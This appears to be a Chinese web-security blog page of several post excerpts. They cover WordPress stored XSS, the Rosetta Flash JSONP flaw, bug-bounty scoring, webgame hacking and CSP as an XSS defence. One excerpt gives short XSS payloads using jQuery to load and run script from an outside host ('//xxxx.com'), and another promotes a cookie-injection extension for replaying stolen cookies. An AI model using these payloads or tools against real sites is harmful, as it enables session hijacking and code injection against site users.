WordPress 双连发存储通杀 XSS 就这样爆爆爆!可惜之余,说下:
- 这种字符集不一致导致的问题会是个普遍问题,不仅是导致 XSS;
- 要完美通杀或 IE 通杀得理解 CSS 导致的一些本质特性;
- 截断问题真是个可爱问题;
- WordPress 的过滤机制真可爱;
- 我们团队的应急真赞;
具体链接:
https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/
WordPress 双连发存储通杀 XSS 就这样爆爆爆!可惜之余,说下:
具体链接:
https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/
博客升级了下,我把一个月前的这篇文章转篇过来。
这次我在 QCon 上海做了《程序员与黑客》的演讲,得到很多认可,这点很欣慰。不过演讲超时20分钟,这点不应该。很多同学意犹未尽,我也是。
这篇文章我说说,我为什么要讲这个议题。
平时工作过于忙碌,技术的敏感度稍显滞后,好在隐隐感觉黑哥与小熊在群里提到的Flash 0day特性(CVE-2014-4671)具备非常大的价值,于是保存了笔记,晚上抽空断断续续研究了下,才意识到这个0day的价值。
原文链接:
http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
乌云昨天出了个翻译:
http://drops.wooyun.org/tips/2554
看到那么多苦逼的跨站师在问Cookie利用工具,不忍心,还是把自己写的Chrome扩展开源出来吧,功能极简,仿造我之前文章《我的渗透利器》里提到的Original Cookie Injector for Greasemonkey。
效果
在Chrome下按alt+c快捷键打开如下图:
最近一直在知乎游荡,假期没啥事。
看到有同学@我,问:
大家来研究探讨一下,网页游戏攻防技术。必定,这个话题很敏感。目前,网页游戏已经很多了,会不会被黑产盯上?网页游戏会不会被黑掉,数据库会不会泄露?
我的回答如下:
这个得游戏安全同学来回答更好,不过我说下我的一些hacking心得吧。
最近一段时间,知道创宇的wsl小伙伴们发出了一个疑问:
我给tsrc提交的漏洞和xxx是一样的啊,为什么我的分少?
这个小伙伴的疑问的问题在于,没搞清楚漏洞的价值,漏洞价值体现在漏洞影响上,几个维度:
1. 漏洞本身的危害,比如一般情况下SQL的危害大于XSS;
2. 漏洞的易利用程度,一步搞定目标?还是要结合社工等,N步搞定目标,这个决定了成功率;
3. 目标群体大小,QQ群体规模>企业QQ;
4. 目标本身的价值,一般情况下,企业QQ>普通QQ,如你是要搞Q币,那就是普通QQ>企业QQ;
5. 社会影响面,如果被炒作了……这点可以忽略,要不然太复杂了;
后台灰盒+exp被限制40字符+script等标签被过滤。
很多人祭出0day bypass,没必要。先分析场景。最爽的是我看到场景使用了jquery,在昨天的一个攻击场景下,我推测那后台用jquery是必然的。
于是简短强悍的exp如:
1. eval($.get('//xxxx.com'))
2. $.getScript('//xxx.com') // 这个最牛逼,我当时没意识到,pw实战发现
思想是:攻击得原生态,依赖场景,这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。
大家举一反三吧。
update: 2013/10/10
Firefox下
http://threatpost.com/csp-1-0-added-to-firefox-to-block-xss-attacks/
X-Content-Security-Policy头会变为:Content-Security-Policy。
我没测试,不过据说Firefox、Chrome、IE10(沙箱模式)都支持了这个头。CSP1.0 还支持内嵌的样式的屏蔽,这些目的都是为了防御XSS。
我们的《Web前端黑客技术揭秘》最后一章有详细说明(http://vdisk.weibo.com/s/GDqYZ,开放),并认为CSP最终会成为XSS的终结者。不过这需要那些网站配合浏览器的CSP策略了,不仅能保证代码编写规范,也能保证前端安全性。
:)